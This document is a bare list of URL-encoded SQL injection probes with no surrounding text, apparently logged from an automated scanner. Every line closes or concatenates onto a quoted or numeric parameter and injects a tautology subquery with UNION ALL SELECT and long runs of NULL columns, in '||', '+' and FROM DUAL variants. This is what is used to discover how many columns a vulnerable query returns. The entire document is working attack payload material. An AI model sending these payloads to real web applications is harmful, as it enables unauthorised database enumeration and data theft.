1%27%20%7C%7C%20%28SELECT%207933%20WHERE%205014%3D5014%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203840%20WHERE%205330%3D5330%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206348%20WHERE%208432%3D8432%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206798%20WHERE%204386%3D4386%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201907%20WHERE%201888%3D1888%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201187%20WHERE%204419%3D4419%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204298%20WHERE%203374%3D3374%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209193%20WHERE%207815%3D7815%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206491%20WHERE%202482%3D2482%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209101%20WHERE%205436%3D5436%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%202223%20FROM%20DUAL%20WHERE%205449%3D5449%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%207304%20FROM%20DUAL%20WHERE%209708%3D9708%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%201643%20FROM%20DUAL%20WHERE%203549%3D3549%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%208680%20FROM%20DUAL%20WHERE%203402%3D3402%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%204240%20FROM%20DUAL%20WHERE%208730%3D8730%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%207220%20FROM%20DUAL%20WHERE%202041%3D2041%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%202042%20FROM%20DUAL%20WHERE%206559%3D6559%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%207081%20FROM%20DUAL%20WHERE%209745%3D9745%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%202829%20FROM%20DUAL%20WHERE%204084%3D4084%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%208214%20FROM%20DUAL%20WHERE%204579%3D4579%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%208491%20WHERE%209856%3D9856%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%202878%20WHERE%207920%3D7920%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%206863%20WHERE%207546%3D7546%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%202895%20WHERE%206753%3D6753%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%201576%20WHERE%209627%3D9627%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%203253%20WHERE%201846%3D1846%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%206144%20WHERE%204667%3D4667%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%208861%20WHERE%204027%3D4027%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%204189%20WHERE%203610%3D3610%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%20%2B%20%28SELECT%202663%20WHERE%201237%3D1237%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1%27%20%2B%20%28SELECT%20%27JeTj%27%20FROM%20DUAL%20WHERE%208202%3D8202%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27JnrK%27%20FROM%20DUAL%20WHERE%201346%3D1346%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Rxvu%27%20FROM%20DUAL%20WHERE%204574%3D4574%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27CXiE%27%20FROM%20DUAL%20WHERE%205785%3D5785%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27KrOr%27%20FROM%20DUAL%20WHERE%207594%3D7594%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 